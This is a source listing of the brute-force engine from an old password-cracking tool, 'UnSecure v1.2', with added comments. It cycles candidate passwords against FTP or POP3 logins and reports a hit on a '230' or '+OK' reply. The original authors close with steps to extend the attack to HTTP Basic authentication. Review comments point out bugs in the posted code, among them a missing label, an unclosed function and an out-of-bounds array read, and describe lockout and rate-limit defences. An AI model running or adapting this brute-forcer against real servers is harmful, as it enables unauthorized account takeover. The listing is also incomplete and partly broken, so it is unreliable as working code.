Brute force and ports algorithm source code for Unsecure.
4542d93ec268571ae1545491fd40563a UnSecure v1.2 "the part that does the fun work" code.
by Utah, Guns, and Paine.
--------------------------|CUT HERE|-----------------------------------
//This is the actual C++ code for the brute force and ports algorithm.
//It was written in VC++ 5
//
//At the end I explain how to build in an attack for protected web pages.
//
//There is odd code in there, for CString conversions, but it's
//basically a direct rip of the brute force, and port code :
//
//We use RAW sockets... it's a lot faster than going through win API
//
//Note : this function was threaded so there is no actual GUI interaction
//variables starting with a g_ are global, and therefore accessible by
//threads and the GUI
//
//Have fun!
// Threaded brute-force worker.  Everything it needs comes from globals set
// by the GUI (brute_* flags, g_custom, g_ip, g_port, g_brutenum,
// g_open/g_password for resuming, g_rec); it builds the candidate character
// set in `alphabet`, opens one connection on `sc2`, then enumerates
// candidates of growing length, sending each as a "pass <candidate>" line
// and inspecting the first three bytes of the reply.  "230" or "+OK" is
// treated as success -- those look like the FTP "logged in" and POP3
// positive-status replies, but nothing in this listing pins down the
// service.
//
// Review notes on the listing as posted (nothing is changed here):
//  - Only `y` is declared locally; x, z, count, count2, cnt, ch, used,
//    xpass, snd, snd2, rcv, rcv2, sc, sc2, c and l must be members or
//    globals defined elsewhere.
//  - `goto stopit` appears four times but no `stopit:` label is in the
//    listing, and the function's opening brace is never closed, so the
//    tail of the function was lost when it was posted.
//  - The header comment says "RAW sockets", but what the code actually
//    uses is a socket object with Create/Connect/Send/Receive methods.
//  - Defender's view: the traffic is one long-lived session issuing a
//    steady stream of "pass " lines that never succeed, followed by an
//    unbounded reconnect spin (g_rec branch) if the server drops it.
//    Per-session and per-source failed-login limits plus account lockout
//    are the direct mitigations, and that pattern -- many PASS attempts
//    per session, immediate reconnects after a disconnect -- is what to
//    alert on.
void brute_and_port_stuff_decently_optimized()
{
//Was brute force selected
if(brute_flag==TRUE) {
//The next if statements look for options being checked in the GUI
//We have an array, alphabet, which designates what characters to use.
//Using the ASCII charset, we loop through and add the chars.
//Alphamax points to the end of the charset in the array.
//Note: alphamax is not reset in this function before these loops (only
//the custom branch below zeroes it), so it starts at whatever it held.
if(brute_special==TRUE) {
//"Special" takes every printable ASCII code 33..126 ('!'..'~'), and
//because of the else the upper/lower/digit options are then ignored.
for(x=33;x<127;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
else {
if(brute_uaz==TRUE) {
//ASCII 65..90 = 'A'..'Z'
for(x=65;x<91;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
if(brute_laz==TRUE) {
//ASCII 97..122 = 'a'..'z'
for(x=97;x<123;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
if(brute_09==TRUE) {
//ASCII 48..57 = '0'..'9'
for(x=48;x<58;) {
alphabet[alphamax]=x;
x++;
alphamax++;
}
}
}
if(brute_custom==TRUE) {
//A custom set replaces whatever was built above (alphamax reset to 0).
alphamax=0;
g_custom2=g_custom+"<<";
//We have to do odd things when converting using the CString type.
//"<<" is appended purely as a terminator for the copy loop, so a custom
//set containing '<' is cut off at that character.
for(count2=0;g_custom2[count2]!='<';) {
alphabet[count2]=g_custom2[count2];
count2++;
}
alphamax=count2;
}
g_pause=0;
sc2.Create();
g_status="Attempting to connect...";
cnt=sc2.Connect(g_ip, g_port);
//A zero return is treated as connection failure.
if(cnt==0) {
g_status="No connection could be established";
goto stopit;
}
g_status="A connection was established";
//One reply is read before anything is sent (presumably the greeting).
sc2.Receive(&rcv, sizeof(rcv), 0);
int y;
//ch[i] is the index into alphabet for candidate position i; -1 means
//"not yet advanced".  used[i]==1 marks positions that belong to the
//current candidate.  Both arrays are indexed 0..19 below, plus ch[20] /
//used[20] on a carry out of position 19, so they must be larger than 20.
for(y=0;y<20;) {
ch[y]=-1;
y++;
}
ch[0]=-1;
//Positions 1..g_brutenum-1 start in use at index 0; position 0 is
//advanced by the loop, so enumeration begins at length g_brutenum.
//used[0] itself is never set in this function -- presumably elsewhere.
for(x=1;x<g_brutenum;x++) {
used[x]=1;
ch[x]++;
}
//Resume: when g_open==1, seed ch[]/used[] from g_password by looking each
//character up in alphabet[0..99] (alphamax is not consulted here).
if(g_open==1)
for(x=0;x<strlen(g_password);) {
used[x]=1;
for(y=0;y<100;) {
if(alphabet[y]==g_password[x])
ch[x]=y;
y++;
}
x++;
}
//Odometer enumeration: runs until position 19 rolls past the end of the
//alphabet, i.e. until every length up to 20 has been tried.
while(ch[19]<alphamax) {
ch[0]++;
//Carry: a position that reached alphamax wraps to -1 and bumps the next
//one, which thereby becomes part of the candidate.
for(x=0;x<20;) {
if(ch[x]==alphamax) {
used[x+1]=1;
ch[x]=-1;
ch[x+1]++;
}
x++;
}
x=x;
//Materialise the candidate into xpass and snd2; a wrapped position (-1)
//is read as index 0.
for(x=0;x<20;) {
if(used[x]==1) {
if(ch[x]==-1)
ch[x]=0;
xpass[x]=alphabet[ch[x]];
snd2[x]=alphabet[ch[x]];
}
x++;
}
//x becomes 5 (length of "pass ") + number of positions in use.
//Note: z starts at -1, so this loop reads used[-1], one before the array.
x=5;
for(z=-1;z<20;z++) {
if(used[z]==1)
x++;
}
g_putpass=xpass;
g_putpass="pass "+g_putpass;
//Blank the tail of xpass from index x-1; the loop after the CR LF below
//does the same from x-5 and covers this one.  No NUL terminator is
//written within the array here.
for(z=x-1;z<sizeof(xpass);z++)
xpass[z]=' ';
//Copy "pass <candidate>" into snd2 and the candidate part back into
//xpass; count2 ends equal to x.
for(count2=0;count2<x;) {
snd2[count2]=g_putpass[count2];
if(count2>4)
if(count2-5<x-4)
xpass[count2-5]=g_putpass[count2];
count2++;
}
//CR LF terminates the command line.
snd2[x]=13;
snd2[x+1]=10;
z=x-5;
for(x=z;x<sizeof(xpass);) {
xpass[x]=' ';
x++;
}
//The current candidate is published so a later run can resume from it
//(see the g_open block above).
g_password="";
g_password=xpass;
g_status="Testing account";
//snd and count are not set anywhere in this function; presumably the
//user line prepared elsewhere.
g_stay=sc2.Send(&snd, count+2, 0);
g_status="Waiting for response";
g_stay=sc2.Receive(&rcv, sizeof(rcv), 0);
g_status="Testing account";
//count2+2 = the text plus the CR LF written above.
g_stay=sc2.Send(&snd2, count2+2, 0);
g_status="Attacking";
//Note: the size passed is sizeof(rcv), not sizeof(rcv2).
g_stay=sc2.Receive(&rcv2, sizeof(rcv), 0);
g_status="Combination transmission complete";
g_wordsdone++;
//Only the first three reply bytes are compared; no terminator is written
//into g_cmp here, so strstr relies on it being zeroed elsewhere.
g_cmp[0]=rcv2[0];
g_cmp[1]=rcv2[1];
g_cmp[2]=rcv2[2];
if(strstr(g_cmp, "230")) {
g_finalpass=g_ip+" is UnSecure."+c+l+"The password is "+xpass;
AfxMessageBox(g_finalpass);
g_good=1;
goto stopit;
}
if(strstr(g_cmp, "+OK")) {
g_finalpass=g_ip+" is UnSecure."+c+l+"The password is "+xpass;
AfxMessageBox(g_finalpass);
g_good=1;
goto stopit;
}
if(g_stay==SOCKET_ERROR) {
g_status="You have been disconnected";
if(g_rec==TRUE)
{
g_status="Attempting to RE - connect...";
//Both sockets are closed but only sc2 is recreated, and the loop below
//retries Connect with no delay and no attempt limit -- from the server
//side this is a burst of connection attempts right after a disconnect,
//which is the easy thing to log and rate-limit.
sc2.Close();
sc.Close();
cnt=0;
sc2.Create();
while(cnt==0) {
cnt=sc2.Connect(g_ip, g_port);
}
}
else
goto stopit;
}
}
g_status="Brute force attack finished";
sc2.Close();
}
--------------------------|CUT HERE|-----------------------------------
Now I'll explain how you could add this to secure/unsecure webservers.
(HTTP authentication)
Connect to port 80 of the server.
Issue this command :
GET / HTTP/1.0
followed by a CRLF, where the first / is the protected page.
Now issue this command :
Authorization: Basic 8f4398j:494w094
Where the 8f4398j:494w094 is a username/password pair base 64 encoded.
To encode to base 64 :
get three bytes (total of 24 bits)
split the 24 bits in to four 6 bit numbers.
Repeat process.
Ex:
00101101 | 10010110 | 01101001
becomes
001011 | 011001 | 011001 | 101001
Test it by telnetting to port 80 on a server with a protected page.
There you have it.
Like I said... Have fun.
--Utah